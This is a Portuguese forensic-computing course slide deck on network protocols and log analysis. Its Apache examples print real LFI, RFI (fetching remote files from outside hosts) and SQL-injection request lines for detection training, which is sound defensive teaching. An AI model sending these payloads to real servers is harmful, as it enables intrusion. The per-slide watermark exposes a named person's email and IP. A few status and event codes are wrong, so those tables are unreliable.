MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179Cabeçalho DNS – Campo Parâmetro (RFC 1035)
• RA: Significa recursion available.
Esse bit é habilitado na resposta caso
o servidor suporte recursão.
• rcode: Os valores mais comuns são 0
(no error) e 3 (name error)
185
1
QR CÓDIGO DE OPERAÇÃO (OPCODE) AA TC RD RA ZERO CÓDIGO DE RESPOSTA (RCODE)
1 1 1 14 43
0 3116
NÚMERO DE SERVIDORES AUTORITATIVOS NÚMERO DE INFORMAÇÕES ADICIONAIS
SEÇÃO DE CONSULTA
...
SEÇÃO DE RESPOSTA
...
SEÇÃO DE SERVIDORES AUTORITATIVOS
...
SEÇÃO DE INFORMAÇÕES ADICIONAIS
...
IDENTIFICAÇÃO PARÂMETRO
NÚMERO DE CONSULTAS NÚMERO DE RESPOSTAS
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DNS – Mensagens (RFC 1035)
• Query Domain Name: É o nome procurado (o nome a ser resolvido).
É a sequência de um ou mais rótulos.
186
TIPO DA CONSULTA CLASSE DA CONSULTA
NOME A SER CONSULTADO (QUERY DOMAIN NAME)
0 3116
• Cada consulta possui um “Tipo de Consulta”.
• As resposta das consultas são chamadas resource record.
• Classe da Consulta (Query Class): normalmente possui
o valor 1, indicando que é um endereço IP.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DNS – Resource Record (RFC 1035)
• Os últimos três campos do cabeçalho DNS (Seção de Resposta, Seção de Servidores
Autoritativos e Seção de Informações Adicionais) compartilham o mesmo formato chamado
Resource Record ou RR.
187
0 3116
TTL (TIME TO LIVE – TEMPO DE VIDA)
TAMANHO DO RECURSO 
(RESOURCE DATA LENGTH)
DADOS DO RECURSO (RESOURCE DATA)
...
NOME DO RECURSO (RESOURCE DOMAIN NAME)
...
TIPO CLASSE
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DNS – Resource Record (RFC 1035)
• Nome do Recurso: Nome do recurso (hostname/domínio) solicitado.
• Tipo: especifica um dos códigos de tipo de registro (RR - Resource Record).
• Classe: normalmente possui o valor 1, indicando que é um endereço IP.
• TTL: Número de segundos que o registro (RR) pode ficar armazenado no cache do cliente.
• Tamanho do Recurso: corresponde a quantidade de dados. Esse formato depende do valor do 
tipo. Se for do tipo 1 (AA) os dados são um endereço IP de 4 bytes.
188
0 3116
TTL (TIME TO LIVE – TEMPO DE VIDA)
TAMANHO DO RECURSO 
(RESOURCE DATA LENGTH)
DADOS DO RECURSO (RESOURCE DATA)
...
NOME DO RECURSO (RESOURCE DOMAIN NAME)
...
TIPO CLASSE
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Exibindo e Apagando o Cache DNS (Local) – Apenas Windows
189
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Exibindo os Registros de um Servidor DNS no Windows
190
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
FTP
File Transfer Protocol
191
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
FTP (RFC 959)
Fonte: Redes de Computadores e a Internet, James Kurose, 6ª Edição, Pág: 86
• Transferência de arquivos de e para o computador remoto
• Modelo cliente servidor
• Cliente: lado que inicia a transferência (seja de ou para o lado remoto)
• Servidor: hospedeiro remoto
• RFC 959: servidor usa porta 21
• RFC 4121: servidor usa a porta 990
192
Fonte: Redes de Computadores e a
Internet, James Kurose, 6ª Edição, Pág: 86
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Comandos FTP
• USER username: usado para enviar identificação do usuário
• PASS password: uado para enviar a senha do usuário ao servidor
• LIST: usado para pedir ao servidor que envie uma lista com todos os arquivos existentes
no atual diretório remoto.
• RETR filename: usado para extrair (obter) um arquivo do diretório atual do hospedeiro
remoto. Equivale ao comando de terminal GET.
• STOR filename: usado para armazenar (inserir) um arquivo no diretório atual do
hospedeiro remoto. Equivale ao comando de terminal PUT.
• SYST: lista o tipo de sistema operacional utilizado no servidor
• TYPE type: indica qual o tipo de arquivo a ser transferido
• CWD: altera o diretório corrente
• PWD: lista o diretório corrente
• LOGOUT (QUIT): finaliza uma conexão
193
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Exemplo de Conexão FTP
194
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
HTTP
Hypertext Transfer
Protocol
195
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
HTTP (RFCs 1945 e 2616) – Mensagem de Requisição
• A primeira linha de uma mensagem de
requisição HTTP é denominada linha
de requisição; as linhas subsequentes
são denominadas linhas de cabeçalho.
• A linha de requisição tem 3 campos:
método, URL e versão HTTP. O campo
método pode assumir os valores GET,
POST e HEAD.
Fonte: Redes de Computadores e a
Internet, James Kurose, 6ª Edição, Pág: 77
196
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
HTTP (RFCs 1945 e 2616) – Mensagem de Requisição
• A linha de cabeçalho HOST especifica o hospedeiro
no qual o objeto reside.
• A linha de cabeçalho CONNECTION especifica se o
servidor usará conexões persistentes ou não
persistentes.
• A linha de cabeçalho USER-AGENT especifica o
tipo de browser que está fazendo a requisição ao
servidor.
• A linha de cabeçalho ACCEPT-LANGUAGE mostra
que o usuário prefere receber uma versão do objeto
em francês. Se o objeto não existir na versão
solicitada o servidor envia a versão default.
Fonte: Redes de Computadores e a
Internet, James Kurose, 6ª Edição, Pág: 76
197
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
HTTP (RFCs 1945 e 2616) – Mensagem de Resposta
Fonte: Redes de Computadores e a
Internet, James Kurose, 6ª Edição, Pág: 78
• Possui 3 seções: a linha de estado, seis
linhas de cabeçalho e o corpo da entidade.
• A linha de estado tem 3 campos: versão
do HTTP, código de estado e uma
mensagem de estado correspondente.
198
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
HTTP (RFCs 1945 e 2616) – Mensagem de Resposta
• A linha de cabeçalho CONNECTION especifica se
o servidor irá fechar ou não a conexão após enviar
a mensagem.
• A linha de cabeçalho DATE especifica a hora e a
data em que a resposta HTTP foi criada e enviada
pelo servidor.
• A linha de cabeçalho SERVER especifica em qual
servidor a mensagem de resposta foi gerada.
Fonte: Redes de Computadores e a
Internet, James Kurose, 6ª Edição, Pág: 77
199
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
HTTP (RFCs 1945 e 2616) – Mensagem de Resposta
• A linha de cabeçalho LAST-MODIFIED especifica
a hora e a data em que o objeto foi criado ou
sofreu a última alteração.
• A linha de cabeçalho CONTENT-LENGTH
especifica a quantidade de bytes do objeto que está
sendo enviado.
• A linha de cabeçalho CONTENT-TYPE especifica
o tipo de objeto está presente no corpo da
mensagem.
Fonte: Redes de Computadores e a
Internet, James Kurose, 6ª Edição, Pág: 77
200
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Códigos de Status de uma Conexão HTTP
1xx (Informativo)
100 – Continuar
101 – Mudando protocolo
2xx (Sucesso)
200 – OK
202 – Aceito
203 – Não autorizado
204 – Nenhum conteúdo
3xx (Instruções redirecionamento)
300 – Múltipla escolha
301 – Movido
302 – Encontrado
304 – Não modificado
4xx (Erro cliente)
401 – Não autorizado
403 – Proibido
404 – Não encontrado
5xx (Erro Servidor)
500 – Erro interno do servidor
502 – Bad gateway
503 – Serviço indisponível
1
2
4
3
5
201
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
SMTP
Simple Mail Transfer
Protocol
202
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Padrões para Correio Eletrônico
203
• RFC 5321: SMTP - Simple Mail Transfer Protocol
• RFC 5322: Internet Message Format
• RFC 2045:MIME Part One - Format of Internet Message Bodies
• RFC 2046: MIME Part Two - Media Types
• RFC 2047: MIME Part Three - Message Header Extensions for Non-ASCII Text
• RFC 2048: MIME Part Four - Registration Procedures
• RFC 2049: MIME Part Five - Conformance Criteria and Examples
• RFC 1939: Post Office Protocol - Version 3
• RFC 3501: Internet Mesage Access Protocol - Version 4 rev1
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Sistema de E-mail da Internet
204
Fonte: Redes de Computadores e a
Internet, James Kurose, 6ª Edição, Pág: 88
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
SMTP (RFC 5321)
205
Fonte: Interligação de Redes com TCP/IP,
Douglas Comer, 6ª Edição, Pág: 516
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
MIME (Multipurpose Internet Mail Extensions)
206
Fonte: Interligação de Redes com TCP/IP,
Douglas Comer, 6ª Edição, Pág: 519
Fonte: Interligação de Redes com TCP/IP,
Douglas Comer, 6ª Edição, Pág: 521
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Análise de Logs
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Logs
208
• Os logs são registros de informações relacionadas a eventos que ocorreram relacionados
aos sistemas e redes de uma empresa.
• Há basicamente 3 tipos de logs:
• Logs de Sistemas Operacionais: Registros de eventos de servidores, estações de
trabalho e dispositivos de rede.
• Logs de Aplicação: Registros de eventos das aplicações sendo executadas nos
servidores, ativos (appliances) e nas estações de trabalho.
• Logs de Segurança: Registros de eventos relacionados a segurança dos sistemas,
servidores, rede e estações de trabalho.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Arquiteturas de Logs
209
• Há basicamente 3 tipos de arquiteturas de logs:
• Local: Os logs são coletados individualmente e armazenados em um disco
localmente.
• Descentralizado: Os logs são enviados para diferentes sistemas através da rede.
Comumente utilizado em ambientes onde há gerenciamento descentralizado dos
recursos de TI.
• Centralizado: Os logs são agregados em um servidor ou um grupo de servidores
gerenciados e sincronizados de forma centralizada.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Syslog
210
• Syslog é um protocol utilizado para enviar mensagens de log de eventos através da rede e
armazenamento centralizado. O objeto que recebe as mensagens de log é chamado de syslog
server, syslog daemon ou syslogd.
➢ O Syslog utiliza a porta 514 UDP, podendo utiliar também a porta TCP.
➢ Eenvia por padrão as mensagens em texto claro. Pode ser utilizado TLS ou RELP.
• Reliable Event Logging Protocol (RELP): estende a funcionalidade do protocolo syslog para
fornecer entrega confiável de mensagens de eventos. É mais frequentemente usado em ambientes
que não toleram a perda de mensagens.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Logs de Sistemas Operacionais
211
• No Linux os logs geralmente ficam armazenados em /var/log.
• No Windows a localização dos logs depende da versão do sistema operacional:
➢ No Windows XP os logs são armazenados na pasta %systemroot%\system32\config e
possuem os seguintes nomes: sysevt.evt, secevent.evt e appevent.evt.
➢ A partir do Windows 7 os logs são armazenados na pasta
%systemroot%\system32\winevt\logs e possuem a extensão “.evtx”.
➢ É possível localizar informações do log em
HKLM\System\CurrentControlSet|services\EventLog.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Principais Arquivos de Logs do Windows
212
• SYSTEM
➢ Eventos do sistema operacional e serviços.
➢ Os eventos são classificados como erro, aviso ou informações.
• APPLICATION
➢ Programas
➢ Eventos de outras aplicações diferentes das aplicações do sistema operacional.
➢ Eventos de aplicativo (programa). Os eventos são classificados como erro, aviso ou informações.
• SECURITY
➢ Eventos relacionados à segurança.
➢ Os eventos são chamados de auditorias e são classificados como bem-sucedido ou falha.
✓ Sucesso na auditoria: A ação foi bem sucedida, bem como seu registro.
✓ Falha de auditoria: A ação falhou, mas o registro foi bem sucedido.
➢ Visível somente ao Administrador.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Principais Eventos de Logs do SO Windows
213
ID Descrição
42 Computador foi desligado através de hibernação.
531 Tentativa de logon com uma conta desabilitada.
612 Modificações realizadas na política de auditoria.
624 Uma conta foi criada.
642 Uma conta foi modificada.
5156
Informa toda vez que o WFP (Windows Filtering Platform) permite que 
um programa se conecte a outro processo (no mesmo computador ou 
em um computador remoto) em uma porta TCP ou UDP.
6005 Indica quando o computador foi ligado.
6006 Indica quando o computador foi desligado.
6008 Indica que o computador foi desligado incorretamente.
4624 Logon com sucesso.
4625 Logon falhou.
4688 Criação de processo.
7002 Computador foi desligado através de reinicialização.
7035 Foi solicitada a parada de um serviço.
7036 O serviço parou.
Código de Falha de 
Logon
Descrição
0xC0000064 Nome de usuário não existe.
0xC000006A Usuário está correto, mas a senha está 
errada.
0xC000006D A tentativa de logon é inválida.
0xC00000234 Usuário atualmente bloqueado.
0xC0000064
Usuário tentou se logar fora do horário
permitido. / A conta especificada não 
existe.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Logs DHCP
214
• Os logs DHCP são armazenados por padrão na pasta %systemroot%\system32\DHCP.
• Os arquivos são armazenados no padrão: DhcpSrvLog-DIA.log
Campo Log DHCP Descrição
ID Código do evento.
Date A data em que o evento foi registrado.
Time Hora em que o evento foi registrado.
Description A descrição do evento.
IP Address O IP do cliente DHCP.
Hostname O hostname do cliente DHCP.
MAC Address Endereço MAC do cliente DHCP.
Fonte: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-
server-2008-R2-and-2008/dd759178(v=ws.11)
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd759178(v=ws.11)
Exemplo de Log DHCP (Windows)
215
ID, Date,Time, Description, IP Address, Host Name, MAC Address
00,09/26/04,08:37:20,Started,,,
54,09/26/04,08:37:21,Authorization failed,,teste.com.br,
51,09/26/04,09:08:45,Authorization succeeded,,teste.com.br,
55,09/26/04,09:09:29,Authorized(servicing),,teste.com.br,
10,09/26/04,09:11:33,Assign,192.168.254.11,,000039AE4983
11,09/26/04,09:12:23,Renew,192.168.254.11,,000039AE4983
01,09/26/04,09:27:42,Stopped,,,
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Exemplo de Log DHCP (Linux)
216
• Dependendo da distribuição Linux podem ser usados os seguintes comandos:
➢ journalctl | grep -Ei 'dhcpack'
➢ cat /var/log/syslog | grep -Ei 'dhcpack'
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Exemplo de Log DHCP (CISCO)
217
2011-04-29T16:02:39-06:00 ant-fw : %ASA-6-604103: DHCP daemon interface inside: address granted
0100.0bcd.c2e4.91 (192.168.30.101)
2011-04-29T16:05:01-06:00 ant-fw : %ASA-6-604103: DHCP daemon interface inside: address granted
0100.1279.64f7.18 (192.168.30.102)
2011-04-29T16:32:39-06:00 ant-fw : %ASA-6-604103: DHCP daemon interface inside: address granted
0100.0bcd.c2e4.91 (192.168.30.101)
2011-04-29T16:35:01-06:00 ant-fw : %ASA-6-604103: DHCP daemon interface inside: address granted
0100.1279.64f7.18 (192.168.30.102)
2011-04-29T16:47:35-06:00 ant-fw : %ASA-6-604103: DHCP daemon interface inside: address granted
0026.22cb.1017(192.168.30.105)
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Logs Windows Firewall
218
• Os logs do Firewall do Windows são armazenados em:
➢ %systemroot%\system32\pfirewall.log
➢ %systemroot%\system32\LogFiles\Firewall\pfirewall.log
➢ %systemroot%\system32\Wbem\Repository\FS\objects.data
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Exemplo Log Windows Firewall
219
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2019-04-20 17:33:16 ALLOW UDP 192.168.17.129 192.168.17.2 60924 53 0 - - - - - - - SEND
2019-04-20 17:33:16 ALLOW UDP 192.168.17.129 192.168.17.2 63314 53 0 - - - - - - - SEND
2019-04-20 17:33:18 ALLOW UDP 192.168.17.129 192.168.17.2 59666 53 0 - - - - - - - SEND
2019-04-20 17:33:18 ALLOW TCP 192.168.17.129 200.17.41.185 49585 80 0 - 0 0 0 - - - SEND
2019-04-20 17:33:48 DROP UDP 192.168.17.150 192.168.17.129 137 137 78 - - - - - - - RECEIVE
2019-04-20 17:33:48 ALLOW UDP 192.168.17.129 192.168.17.2 57135 53 0 - - - - - - - SEND
2019-04-20 17:33:53 ALLOW UDP 192.168.17.129 192.168.17.2 52609 53 0 - - - - - - - SEND
2019-04-20 17:33:53 DROP UDP 192.168.17.1 239.255.255.250 53299 1900 165 - - - - - - - RECEIVE
2019-04-20 17:33:55 DROP UDP 192.168.17.1 239.255.255.250 49248 1900 202 - - - - - - - RECEIVE
2019-04-20 17:33:55 DROP UDP 192.168.17.1 192.168.17.255 137 137 78 - - - - - - - RECEIVE
2019-04-20 17:33:55 DROP UDP 192.168.17.1 224.0.0.252 56342 5355 55 - - - - - - - RECEIVE
2019-04-20 17:33:55 DROP UDP fe80::906b:9180:8efe:8180 ff02::1:3 56342 5355 75 - - - - - - - RECEIVE
2019-04-20 17:33:55 DROP UDP fe80::906b:9180:8efe:8180 ff02::1:3 52076 5355 73 - - - - - - - RECEIVE
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Logs de Aplicações
220
• Dependendo da aplicação os logs podem ficar armazenados em diferentes lugares.
• No Windows podem estar localizados em:
➢ %systemroot%\usuários\<usuário>\Appdata\Local 
➢ %systemroot%\ProgramData\<programa>
➢ No Windows 10 ficam geralmente localizados em 
c:\usuários\<usuário>\Appdata\Local ou c:\ProgramData\<programa>
• No Linux geralmente estão localizados em: \usr\share
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Formatos de Logs Web
221
• As tabelas a seguir listam os
intervalos do arquivo de log e
arquivos de nomes disponível para
cada formato de arquivo de log
usando a seguinte sintaxe:
nn = dígitos sequenciais
yy = ano
mm = mês
ww = semana
dd = dia
hh = hora (formato de 24 horas)
Formato de Log do Microsoft IIS 
(Internet Information Services)
Formato de arquivo de Log do NCSA 
(National Center for Supercomputing
Applications)
Intervalo de log
Nome de arquivo 
padrão
Intervalo de log
Nome de arquivo 
padrão
Tamanho do 
arquivo
inetsvnn.log
Tamanho do 
arquivo
ncsann.log
Por hora inyymmddhh.log Por hora ncyymmddhh.log
Diárias inyymmdd.log Diárias ncyymmdd.log
Semanal inyymmww.log Semanal ncyymmww.log
Mensal inyymm.log Mensal ncyymm.log
Formato de arquivo de Log 
estendido do W3C 
(World Wide Web Consortium)
Internet Binary Log 
(IIS 6.0)
Intervalo de log
Nome de arquivo 
padrão
Intervalo de log
Nome de arquivo 
padrão
Tamanho do 
arquivo
extendnn.log Por hora rawyymmddhh.ibl
Por hora exyymmddhh.log Diárias rawyymmdd.ibl
Diárias exyymmdd.log Semanal rawyymmww.ibl
Semanal exyymmww.log Mensal rawyymm.ibl
Mensal exyymm.log
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Servidor Apache
222
• Possibilita o armazenamento dos logs em um arquivo único ou diversos arquivos de logs registrando
cada evento ocorrido no sistema (conexão, navegador, bloqueio de acesso, erros etc).
• Os logs são armazenados em:
➢ /var/log/apache2: Debian/Ubuntu
➢ /var/log/httpd: Red Hat/CentOS/Fedora
• Utiliza o padrão NCSA (National Center for Supercomputing Applications).
• Principais arquivos geralmente gerados:
➢ access.log (Debian/Ubuntu) --- access_log (Red Hat/CentOS/Fedora)
➢ error.log (Debian/Ubuntu) --- error_log (Red Hat/CentOS/Fedora)
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Exemplos Log Apache – Ataque Local File Include (LFI)
223
46.28.0.24 - - [09/Aug/2011:05:08:46 -0300] "GET /sip5/?pg=inicio/?
pg=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 4222 "-"
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre)
Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1“
46.28.0.24 - - [09/Aug/2011:05:08:47 -0300] "GET /?
pg=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 9170 "-"
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre)
Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1“
46.28.0.24 - - [09/Aug/2011:05:08:48 -0300] "GET /sip5/?
pg=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 4222 "-"
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre)
Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1“
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Exemplos Log Apache – Ataque Remote File Include (RFI)
224
46.28.0.24 - - [09/Aug/2011:05:24:03 -0300] "GET
/sip5/?pg=inicio/?pg=http://nanoline.fr/images/logo.gif? HTTP/1.1" 501 419 "-"
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928
Firefox/2.0.0.7 Navigator/9.0RC1“
46.28.0.24 - - [09/Aug/2011:05:24:03 -0300] "GET
/sip5/?pg=inicio/?pg=http://211.60.155.3/skin/c.txt??? HTTP/1.1" 501 419 "-"
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928
Firefox/2.0.0.7 Navigator/9.0RC1“
46.28.0.24 - - [09/Aug/2011:05:24:05 -0300] "GET
/sip5/?pg=inicio/?pg=http://211.60.155.3/skin/tile.jpg??? HTTP/1.1" 501 419 "-"
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928
Firefox/2.0.0.7 Navigator/9.0RC1"
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Exemplos Log Apache – Ataque SQL Injection
225
192.168.50.1 - - [19/Mar/2011:16:38:52 -0400] "GET /noticias/noticias2.php?id=7%20or
%201=1 HTTP/1.1" 200 236 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30
(KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.742.112 Chrome/12.0.742.112
Safari/534.30“
192.168.50.1 - - [19/Mar/2011:16:39:53 -0400] "GET /noticias/noticias2.php?id=7
HTTP/1.1" 200 171 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)“
192.168.50.1 - - [19/Mar/2011:16:41:30 -0400] "GET /noticias/noticias2.php?id=7 HTTP/
1.1" 200 171 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)“
192.168.50.1 - - [19/Mar/2011:16:41:30 -0400] "GET /noticias/noticias2.php?id=7%3B
%20SELECT%20SLEEP%285%29%3B%23%20AND%20275=275 HTTP/1.1" 200 168
"-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Servidor IIS
226
• Os logs IIS são armazenados por padrão na pasta %windir%\system32\logfiles.
➢ Os arquivos são armazenados (geralmente) no padrão W3C (World Wide Web 
Consortium) usando a seguinte convenção: exyymmdd.log
• Os logs FTP são armazenados por padrão na pasta %windir%\MSFTPSVC também no padrão
W3C (World Wide Web Consortium) usando a seguinte convenção: exyymmdd.log
➢ O FTP usa os mesmos campos do IIS com exceção daqueles relacionados a WEB.
• O Internet Binary Log é o processo onde vários sites inserem dados sem formatação em um 
único arquivo do tipo binário (extensão .ibl). Esse tipo de logging é útil quando muitos 
websites estão armazenados em um mesmo servidor. Suportado pelo IIS 6.0.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Campos Log IIS
227
Campo Descrição
Date Data do evento.
Time Hora no formato UTC
c-ip Endereço IP do Cliente
cs-Username Usuário Autenticado que inicioua requisição; “-” se anônimo
s-ip Endereço IP do servidor
s-port Porta do Servidor
cs-method Método de Requisição HTTP (GET, POST, HEAD)
cs-uri-stem O alvo da ação, por exemplo “index.html”
cs-uri-query
A consulta requisitada pelo usuário; necessário apenas para páginas 
dinâmicas
sc-status O código de status HTTP
sc-win32-status O código de status Windows
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Especialização em Computação Forense
Exemplo de Log IIS
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Servidor Proxy (SQUID)
229
• Os logs do SQUID são armazenados por padrão na pasta /var/log/squid.
Campos Descrição
TIMESTAMP Data e hora em que a solicitação foi concluída.
TOTAL TIME Tempo total gasto para completar o pedido (em milissegundos).
SOURCE Endereço IP do cliente.
ACTION/CODE Ação realizada para a solicitação/código de retorno do HTTP.
SIZE Tamanho total da solicitação em bytes.
METHOD Se a solicitação foi GET ou POST. Se for um tunelamento mostrará CONNECT.
URL Recurso solicitado.
IDENTIDADE DO 
CLIENTE
O Squid pode determinar a identidade de um usuário de duas maneiras diferentes. Uma é
através do protocolo de identificação (ident-RFC 1413); a outra é através do cabeçalho de
autenticação HTTP. Costumeiramente o valor é “-”.
HIERARCHY/FROM Como o objeto é buscado e de onde.
CONTENT TYPE Tipo do objeto.
1617757069.471 13 192.168.100.3 TCP_MISS/302 447 GET http://site.com.br/ - HIER_DIRECT/127.0.0.1 text/html
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Servidor Proxy (SQUID) – Result Codes
230
Result Codes Descrição
TCP_ Refere-se a solicitações na porta HTTP (3128)
TCP_HIT
O Squid encontrou uma provável nova cópia do recurso solicitado em cache e a enviou
imediatamente para o cliente.
TCP_MISS O Squid não tem uma cópia em cache do recurso solicitado.
TCP_REFRESH_HIT
O Squid encontrou uma provável cópia desatualizada do recurso solicitado no cache e enviou uma
solicitação de validação ao servidor de origem (If-Modified-Since). O servidor de origem enviou uma
resposta 304 (Não Modificado), indicando que a cópia do Squid ainda é recente.
TCP_REFRESH_MISS
O Squid encontrou uma provável cópia desatualizada do recurso solicitado no cache e enviou uma
solicitação de validação ao servidor de origem (If-Modified-Since). O servidor respondeu com novo
conteúdo, indicando que a resposta em cache estava realmente obsoleta.
TCP_DENIED
A solicitação do cliente foi negada devido às regras http_access ou http_reply_access. As
solicitações negadas por http_access têm “NONE / -” no nono campo, enquanto aquelas negadas
por http_reply_access têm uma entrada válida.
TCP_REDIRECT
Um programa redirecionador disse ao Squid para gerar um redirecionamento HTTP para um novo
URI.
NONE Resultado não classificado usado para certos erros, como nomes de host inválidos.
TCP_TUNNEL Um túnel foi estabelecido para esta transação. Apenas no Squid 3.5+.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Exemplo Log Cisco
231
Mnemônico Severidade Descrição
%SEC-6-IPACCESSLOGDP 6 A packet matching the log criteria for the given access list has been detected.
%SEC-6-IPACCESSLOGNP 6 A packet matching the log criteria for the given access list has been detected.
%SEC-6-IPACCESSLOGP 6
A packet matching the log criteria for the given access list has been detected (TCP or 
UDP)
%SEC-6-IPACCESSLOGRL 6
Some packet-matching logs were missed because the access list log messages were 
rate limited, or no access list log buffers were available.
%SEC-6-IPACCESSLOGRP 6 A packet matching the log criteria for the given access list has been detected.
%SEC-6-IPACCESSLOGS 6 A packet matching the log criteria for the given access list was detected.
%SEC-4-TOOMANY 4
The system was not able to process the packet because there was not enough room for 
all of the desired IP header options. The packet has been discarded.
%IPV6-6-ACCESSLOGP 6 A packet matching the log criteria for the given access list was detected.
%IPV6-6-ACCESSLOGDP 6 A packet matching the log criteria for the given access list was detected.
%IPV6-6-ACCESSLOGNP 6 A packet matching the log criteria for the given access list was detected.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
HANDS-ON
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Vazamento de Informação
233
• A empresa Anarchy-R-Us Inc. suspeita que um de seus empregados, Ann Dercover, é um agente secreto
trabalhando para seu concorrente. Ann tem acesso a computadores contendo informações confidenciais,
como a receita secreta do produto mais vendido da companhia. A equipe de segurança de TI da empresa está
desconfiada de que Ann está divulgando informações sobre a receita secreta.
• A equipe de TI monitorou as atividades de Ann durante algum tempo, mas não encontrou nada suspeito até
agora. Hoje um laptop suspeito apareceu na rede wireless da companhia. Desconfia-se de que era alguém no
pátio do estacionamento da companhia, pois ninguém estranho foi visto no prédio.
